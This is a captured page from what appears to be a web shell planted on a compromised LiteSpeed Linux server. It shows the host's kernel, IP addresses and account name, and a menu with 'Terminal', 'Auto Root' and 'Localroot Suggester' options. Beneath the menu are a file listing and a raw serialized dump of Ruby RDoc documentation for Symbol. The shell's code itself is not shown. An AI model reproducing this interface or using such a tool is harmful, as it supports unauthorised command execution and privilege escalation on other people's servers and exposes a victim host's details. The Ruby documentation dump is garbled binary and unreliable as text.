Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.222
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby25 /
share /
ri /
2.5.0 /
system /
Symbol /
Delete
Unzip
Name
Size
Permission
Date
Action
%3c%3d%3e-i.ri
669
B
-rw-r--r--
2023-07-26 18:25
%3d%3d%3d-i.ri
393
B
-rw-r--r--
2023-07-26 18:25
%3d%3d-i.ri
390
B
-rw-r--r--
2023-07-26 18:25
%3d%7e-i.ri
327
B
-rw-r--r--
2023-07-26 18:25
%5b%5d-i.ri
339
B
-rw-r--r--
2023-07-26 18:25
all_symbols-c.ri
900
B
-rw-r--r--
2023-07-26 18:25
as_json-i.ri
373
B
-rw-r--r--
2023-07-26 18:25
capitalize-i.ri
402
B
-rw-r--r--
2023-07-26 18:25
casecmp%3f-i.ri
1007
B
-rw-r--r--
2023-07-26 18:25
casecmp-i.ri
995
B
-rw-r--r--
2023-07-26 18:25
cdesc-Symbol.ri
2.11
KB
-rw-r--r--
2023-07-26 18:25
dclone-i.ri
379
B
-rw-r--r--
2023-07-26 18:25
downcase-i.ri
392
B
-rw-r--r--
2023-07-26 18:25
empty%3f-i.ri
331
B
-rw-r--r--
2023-07-26 18:25
encoding-i.ri
362
B
-rw-r--r--
2023-07-26 18:25
id2name-i.ri
481
B
-rw-r--r--
2023-07-26 18:25
inspect-i.ri
454
B
-rw-r--r--
2023-07-26 18:25
intern-i.ri
468
B
-rw-r--r--
2023-07-26 18:25
json_create-c.ri
391
B
-rw-r--r--
2023-07-26 18:25
length-i.ri
325
B
-rw-r--r--
2023-07-26 18:25
match%3f-i.ri
395
B
-rw-r--r--
2023-07-26 18:25
match-i.ri
396
B
-rw-r--r--
2023-07-26 18:25
next-i.ri
312
B
-rw-r--r--
2023-07-26 18:25
size-i.ri
321
B
-rw-r--r--
2023-07-26 18:25
slice-i.ri
357
B
-rw-r--r--
2023-07-26 18:25
succ-i.ri
311
B
-rw-r--r--
2023-07-26 18:25
swapcase-i.ri
392
B
-rw-r--r--
2023-07-26 18:25
to_json-i.ri
367
B
-rw-r--r--
2023-07-26 18:25
to_proc-i.ri
463
B
-rw-r--r--
2023-07-26 18:25
to_s-i.ri
475
B
-rw-r--r--
2023-07-26 18:25
to_sym-i.ri
468
B
-rw-r--r--
2023-07-26 18:25
upcase-i.ri
382
B
-rw-r--r--
2023-07-26 18:25
Save
Rename
U:RDoc::NormalClass[iI"Symbol:ET@I"Object;To:RDoc::Markup::Document:@parts[o;;[ : @fileI"$ext/json/lib/json/add/symbol.rb;T:0@omit_headings_from_table_of_contents_below0o;;[ ; I"lib/rexml/xpath_parser.rb;T; 0o;;[o:RDoc::Markup::Paragraph;[I"B<code>Symbol</code> objects represent names and some strings ;TI"inside the Ruby ;TI"Finterpreter. They are generated using the <code>:name</code> and ;TI"%<code>:"string"</code> literals ;TI"Fsyntax, and by the various <code>to_sym</code> methods. The same ;TI"K<code>Symbol</code> object will be created for a given name or string ;TI"Jfor the duration of a program's execution, regardless of the context ;TI"Ior meaning of that name. Thus if <code>Fred</code> is a constant in ;TI"Cone context, a method in another, and a class in a third, the ;TI"G<code>Symbol</code> <code>:Fred</code> will be the same object in ;TI"all three contexts.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim;[I"module One ;TI" class Fred ;TI" end ;TI" $f1 = :Fred ;TI" end ;TI"module Two ;TI" Fred = 1 ;TI" $f2 = :Fred ;TI" end ;TI"def Fred() ;TI" end ;TI"$f3 = :Fred ;TI"!$f1.object_id #=> 2514190 ;TI"!$f2.object_id #=> 2514190 ;TI" $f3.object_id #=> 2514190;T:@format0; I" string.c;T; 0; 0; 0[ [ [[I"Comparable;To;;[ ; @2; 0I" string.c;T[[I" class;T[[:public[[I"all_symbols;T@:[I"json_create;TI"$ext/json/lib/json/add/symbol.rb;T[:protected[ [:private[ [I" instance;T[[;["[I"<=>;T@:[I"==;T@:[I"===;T@:[I"=~;T@:[I"[];T@:[I"as_json;T@E[I"capitalize;T@:[I"casecmp;T@:[I" casecmp?;T@:[I"dclone;TI"lib/rexml/xpath_parser.rb;T[I" downcase;T@:[I"empty?;T@:[I" encoding;T@:[I"id2name;T@:[I"inspect;T@:[I"intern;T@:[I"length;T@:[I" match;T@:[I"match?;T@:[I" next;T@:[I" size;T@:[I" slice;T@:[I" succ;T@:[I" swapcase;T@:[I"to_json;T@E[I"to_proc;T@:[I" to_s;T@:[I"to_sym;T@:[I"upcase;T@:[;[ [;[ [ [U:RDoc::Context::Section[i 0o;;[ ; 0; 0[@ @@2@2cRDoc::TopLevel